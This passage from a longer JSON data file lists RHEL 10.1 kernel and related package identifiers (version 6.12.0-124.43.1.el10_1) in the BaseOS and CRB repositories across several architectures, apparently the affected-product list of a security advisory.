"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
